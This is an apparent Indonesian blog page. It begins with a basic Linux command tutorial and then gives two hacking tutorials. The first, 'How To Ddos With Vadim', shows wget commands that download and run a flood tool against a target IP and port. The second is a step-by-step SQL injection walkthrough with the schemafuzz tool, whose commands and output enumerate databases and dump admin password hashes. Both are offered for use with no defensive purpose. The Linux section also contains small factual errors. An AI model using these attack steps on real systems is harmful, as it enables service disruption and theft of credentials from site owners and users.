mkdir [nama direktori]
h) tar adalah perintah untuk kompresi dan ekstrak file dengan format .tar
tar [opsi] [namafile]
untuk mengkompresi file dengan perintah
tar cvf [namafile.tar]
untuk mengekstrak file dengan perintah
tar xvf [namafile.tar]
i) gzip, adalah perintah mengkompres file dengan format .zip
gzip [namafile.zip]
j) gunzip, adalah perintah mengekstrak file dengan format .zip
gunzip [namafile.zip]
k) who am i, adalah perintah untuk mengetahui siapa kita user atau super user
who am i
l) whereis, mencari tahu keberadaan file - file tertentu misal kernel, .conf dll.
whereis [namafile]
m) chmod, digunakan untuk merubah hak akses terhadap suatu file
chmod [siapa_aksi_akses] [file]
siapa = u(user)/pemilik, g(group)/ group, o(other)/yang lain
aksi = + (memberikan izin), - (menghapus izin)
akses = r (read)/ baca, w(write)/baca, x(execute)
contoh : chmod u+x nama file
selain dengan cara diatas bisa juga dilakukan dengan cara penulisan oktal dan binary.
Oktal Binary Hak akses
0 0 0 0 - - -
1 0 0 1 - - x
2 0 1 0 - w -
3 0 11 - w x
4 1 0 0 r - -
5 1 0 1 r - x
6 11 0 r w -
7 11 1 r w x
Contoh , chmod 700 [nama file], maka seperti pada format sebelumnya
chmod User Group Other maka
User diberi hak akses 7 yaitu r w x
Group diberi hak akses 0 berarti - - -
dan Other diberi hak akses 0 berarti - - -
n) mount, digunakan untuk mengakses file sistem tidak seperti pada windows linux menganggap sebuah file sistem sebagai direktori sehingga perlu dilakukan mounting.
Biasanya mounting file sistem diletakkan pada /mnt maka sebelumnya harus dibuat terlebih dahulu direktorinya di /mnt dengan perintah mkdir /mnt/floppy misal untuk direktori floppy, mkdir /mnt/win_c misal untuk direktori drive c windows selanjutnya adalah melakukan mounting namun sebelum itukita harus melihat drive apa saja yang ada dengan perintah df dengan perintah ini kita bisa mengetahui apa nama file sistem yang ada misal yang ada adalah /dev/hdb berarti /dev adalah device /hdb berarti cd rom
/dev/hda artinya adalah /hda merupakan partisi dari hard disk, dlinux tidak mengenal drive c,d,e seperti pada windows tapi diberi nomor, hda1, hda5, hda6, sda (biasanya flashdisk). Selanjutnya untuk mengaktifkan partisi harddisk dengan file sistem FAT dengan perintah
mount -t vfat /dev/hda1 /mnt/win_c, mengaktifkan cdrom
mount /dev/hdb /mnt/cdrom, mengaktifkan partisi windows NTFS
mount -t vntfs /dev/hda5 /mnt/win_d
dalam melakukan mounting perlu dilakukan dengan hati-hati dikarenakan apabila melakukan kesalahan maka bisa menghapus sebuah partisi atau file sistem dan tidak dapat dikembalikan, namun tidak perlu khawatir distrolinux sekarang lebih safe dikarenakan proses mounting dilakukan secara otomatis.
o) umount, adalah menonaktifkan device atau file sistem yang telah di mounting dengan perintah
umount [nama direktori]
contoh : umount /mnt/win_c berarti menonaktifkan direktori win_c.
Pada dasarnya perintah- perintah diatas adalah perintah dasar yang sering digunakan didalam linux namun masih banyak lagi perintah-perintah yang lainnya yang perlu di beri catatan bahwa dalam menuliskan perintah dan nama file sangat sensitif dikarenakan di dalam linux penulisan huruf kecil dan huruf besar berbeda sehingga perlu diperhatikan dalam menuliskan perintah.
How To Ddos With Vadim

Ddos atau Denial of Service adalah serangan (attack) yang diluncurkan untuk meniadakan servis (serangan terhadap availability). Atau dengan kata lain DoS dapat dikatakan aktifitas menghambat kerja sebuah layanan (servis) atau mematikannya, sehingga user yang berhak/berkepentingan tidak dapat menggunakan layanan tersebut.
Serangan Dos berdampak terhadap aktifitas yang menjurus kepada tehambatnya aktifitas korban yang dapat berakibat sangat fatal.
step yang dilakukan adalah dalam melakukan serangan Ddos:
A. Connect ke korban (host, port).
B. Kirimkan paket data dalam jumlah besar.
C. Putuskan koneksi > selesai.
cara melakukan Ddos ada berbagai macam ada
yang menggunakan bot,ada yang menggunakan shell ada ada juga yang
menggunakan cammand prompt!!
yang saya ingin bahas disini adalah Ddos dengan menggunakan shell dengan VADIM Ssebagai senjata
untuk menyerang.
Pertama masuk ke shell anda dan ketikkan command berikut pada shell anda
" wget http://url.shell.and.com/vadim.tgz " tekan enter
" chmod 777 vadim.tgz " tekan enter
" tar zxvf vadim.tgz " tekan enter
" cd flood " tekan enter
" ./vadimII [IP.target] [PORT] 10 0 " tekan enter
contoh :
./vadimII 127.0.0.1 80 10 0
22 Januari 2010
Hacking web with schemafuzz
langsung aja tutornya ya :D
siapkan alat dan bahan sebagai berikut :
1.Python (http://www.python.org/ftp/python/2.5/python-2.5.msi)
2.Schemafuzz (http://darkc0de.com/others/schemafuzz.py)
3.CMD
4.Konsole (bagi pengguna linux)
bagi pengguna windust ikuti langkah berikut
buka menu CMD kemudian masuk kedalam directori Cdengan menggunakan perintah
cd c:\ enter
c:\>schemafuzz.py enter
Bagi pengguna linux tinggal mengetikkan di konsloe perintah berikut
./schemafuz.py enter
oke :)
setalah masuk ke direktory schemafuzz
tingal ikuti langkah selanjutnya
1.Cari target
Misal: http://127.0.0.1/site/phpweb/forum.php?forum=1
sebelum kita melangkah lebih lanjut perlu kita ketahui apa saja perintah yang harus digunakan.
caranya seperti ini ./schemafuzz.py -h help
kita temukan sebagian perintahnya seperti ini
–schema, –dbs, –dump, –fuzz, –info, –full, –findcol
langkah pertama
—————-
./schemafuzz.py -u “http://127.0.0.1/site/phpweb/forum.php?forum=1″ –findcol
diperoleh seperti ini
[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1–
[+] Evasion Used: “+” “–”
[+] 01:32:04
[+] Proxy Not Given
[+] Attempting To find the number of columns…
[+] Testing: 0,1,2,3,4,5,
[+] Column Length is: 6
[+] Found null column at column #: 1
[+] SQLi URL: http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,1,2,3,4,5–
[+] darkc0de URL: http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5
[-] Done!
langkah kedua
————–
setelah ketemu kita masukkan copy yang darkc0de URL jadi seperti ini
./schemafuzz.py -u “http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5″ –fuzz
diperoleh seperti ini
[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5–
[+] Evasion Used: “+” “–”
[+] 01:37:09
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration…
Database: webthings
User: testing@localhost
Version: 5.0.51a
[+] Number of tables names to be fuzzed: 354
[+] Number of column names to be fuzzed: 263
[+] Searching for tables and columns…
[+] Found a table called: mysql.user
[+] Now searching for columns inside table “mysql.user”
[!] Found a column called:user
[!] Found a column called:password
[-] Done searching inside table “mysql.user” for columns!
[-] [01:37:48]
[-] Total URL Requests 618
[-] Done
langkah ketiga
—————
Setelah kita temukan nama databasenya trus kita lanjutkan kelangkah berikutnya
./schemafuzz.py -u “http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5″ –schema -D namadatabasenya
./schemafuzz.py -u “http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5″ –schema -D webthings
[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5–
[+] Evasion Used: “+” “–”
[+] 01:43:11
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration…
Database: webthings
User: testing@localhost
Version: 5.0.51a
[+] Showing Tables & Columns from database “webthings”
[+] Number of Tables: 33
[Database]: webthings
[Table: Columns]
[0]wt_articles: cod,article_id,subtitle,page,text,text_ori,htmlarticle,views
[1]wt_articles_title: article_id,category,title,active,date,userid,views
[2]wt_articlescat: cod,category
[3]wt_banners: cod,name,active,image,url_image,url,code,views,clicks,periode,start_date,end_date
[4]wt_banners_log: banner,date,views,clicks,sessions
[5]wt_banners_rawlog: banner,type,date,session
[6]wt_centerboxes: cod,pos,active,oneverypage,menuoption,title,content,file,type,draw_box
[7]wt_comments: cod,type,link,date,userid,comment
[8]wt_config: id,config
[9]wt_downloads: id,category,name,active,url,date,size,count,rate_sum,rate_count,short_description,description,small_picture,big_picture,
author_name,author_email,comments,url_screenshot,license,license_text
[10]wt_downloadscat: cod,ref,name,descr
[11]wt_faq: cod,topic,uid,active,question_ori,question,answer_ori,answer
[12]wt_faq_topics: cod,name
[13]wt_forum_log_topics: uid,msgid,logtime,notifysent
[14]wt_forum_msgs: cod,forum,msg_ref,date,userid,title,text_ori,date_der,views,closed,sticky,modifiedtime,modifiedname,notifies
[15]wt_forums: cod,title,descr,locked,notifies,register
[16]wt_forums_mod: forum,userid,type
[17]wt_guestbook: id,datum,naam,email,homepage,plaats,tekst
[18]wt_links: id,category,active,name,url,count,descr,obs
[19]wt_linkscat: cod,name,descr,parent_id
[20]wt_menu: id,pos,title,url,type,newwindow,lang
[21]wt_news: cod,lang,category,catimgpos,date,title,userid,image,align,active,counter,text,text_ori,full_text,
full_text_ori,archived,sidebox,sideboxtitle,sideboxpos
[22]wt_newscat: cod,name,image
[23]wt_online: id,time,uid
[24]wt_picofday: id,category,userid,small_picture,big_picture,description,full_description,views,clicks
[25]wt_picofdaycat: id,name,description
[26]wt_picofdaysel: date,picture_id,views,clicks
[27]wt_polls: cod,dtstart,dtend,question,item01,item02,item03,item04,item05,item06,item07,item08,item09,item10,
count01,count02,count03,count04,count05,count06,count07,count08,count09,count10
[28]wt_sideboxes: cod,pos,side,active,title,content,file,type,function,modules
[29]wt_user_access: userid,module
[30]wt_user_book: userid,cod_user
[31]wt_user_msgs: cod,userid,folder,date,user_from,title,msg_read,text,notify
[32]wt_users: uid,name,password,class,realname,email,question1,question2,url,receivenews,receiverel,country,
city,state,icq,aim,sex,session,active,comments,
newsposted,commentsposted,faqposted,topicsposted,dateregistered,dateactivated,lastvisit,logins,
newemail,newemailsess,avatar,lang,theme,signature,banned,msn,showemail
[-] [01:43:48]
[-] Total URL Requests 270
[-] Done
untuk mengetahui apakah kita bisa load_file dalam site tersebut gunakan perintah ini
./schemafuzz.py -u “http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5″ –info
maka akan tampil seperti ini
[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5–
[+] Evasion Used: “+” “–”
[+] 01:46:51
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration…
Database: webthings
User: testing@localhost
Version: 5.0.51a
[+] Do we have Access to MySQL Database: Yes <– w00t w00t [!] http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,concat(user,0×3a,password),2,3,4,5+FROM+mysql.user– [+] Do we have Access to Load_File: No [-] [01:46:51] [-] Total URL Requests 3 [-] Done ternyata kita gak bisa load_file tapi bisa mengakses ke database mysqlnya hehehe untuk mengetahui beberapa database yang terdapat pada site tersebut, kita gunakan perintah seperti ini ./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" –dbs akan tampil seperti ini [+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5– [+] Evasion Used: "+" "–" [+] 01:58:15 [+] Proxy Not Given [+] Gathering MySQL Server Configuration… Database: webthings User: testing@localhost Version: 5.0.51a [+] Showing all databases current user has access too! [+] Number of Databases: 1 [0] webthings [-] [01:58:17] [-] Total URL Requests 30 [-] Done langkah selanjutnya ——————– cara untuk menemukan user dan password kita gunakan perintah –dump -D namadatabase -T namatabel -C namakolom setelah kita menemukan nama database, nama tabel dan kolom tinggal kita masukkan perintah seperti ini ./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" –dump -D webthing -T wt_users -C name,password eing ing eng…. jreennnng….keluar deh user ama passwordnya hasilnya dibawah ini [+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5– [+] Evasion Used: "+" "–" [+] 02:08:47 [+] Proxy Not Given [+] Gathering MySQL Server Configuration… Database: webthings User: testing@localhost Version: 5.0.51a [+] Dumping data from database "webthings" Table "wt_users" [+] Column(s) ['name', 'password'] [+] Number of Rows: 2 [0] admin:e00b29d5b34c3f78df09d45921c9ec47: [1] user:098f6bcd4621d373cade4e832627b4f6: [-] [02:08:48] [-] Total URL Requests 4 [-] Done
Langganan:
Postingan (Atom)






